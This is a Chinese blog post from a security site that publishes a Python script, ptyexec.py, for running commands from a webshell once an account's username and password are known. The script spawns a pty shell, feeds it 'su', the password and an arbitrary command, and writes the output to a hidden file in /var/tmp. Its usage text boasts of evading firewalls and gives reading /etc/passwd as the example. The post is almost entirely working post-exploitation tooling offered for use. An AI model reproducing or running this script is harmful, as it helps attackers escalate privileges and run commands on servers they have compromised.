一个知道帐户名密码在Webshell下执行命令的脚本
- 发表于
- Vulndb
作者:xi4oyu
新站开张,放出来吧。以前是应包总之约写的。前后也没给 过几个人,算是个伪私有版。
#!/usr/bin/env python
#For God sake, Keep it priv4t3
import sys,os,time,pty
def usage():
print "ptyexec.py: fuck the firewall block up"
print "By xi4oyu http://www.pentestday.com"
print "Usage: ptyexec.py <username> <passwd> <command>"
print 'Ext: ptyexec.py root 123456 "cat /etc/passwd"'
print 'Result will be located in /var/tmp'
sys.exit(0)
def fuck_child(pipein):
os.dup2(pipein,0)
fd = open("/var/tmp/.result.txt","a")
os.dup2(fd.fileno(),1)
os.dup2(fd.fileno(),2)
pty.spawn("/bin/sh")
print "GAGA..I'm back,Alt it never be happened"
sys.exit(0)
def fuck_it_up(user,passwd,command):
pipein,pipeout = os.pipe()
#Fork the fucking child
if os.fork() == 0:
fuck_child(pipein)
else:
time.sleep(2)
os.write(pipeout,'su - %s\n'% user)
time.sleep(2)
os.write(pipeout,'%s\n' % passwd)
time.sleep(2)
os.write(pipeout,'%s\n' % command)
time.sleep(2)
os.write(pipeout,'exit\n');
time.sleep(2)
sys.exit(0)
if __name__ == "__main__":
if len(sys.argv) != 4:
usage()
fuck_it_up(sys.argv[1],sys.argv[2],sys.argv[3])
原文连接:一个知道帐户名密码在Webshell下执行命令的脚本
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。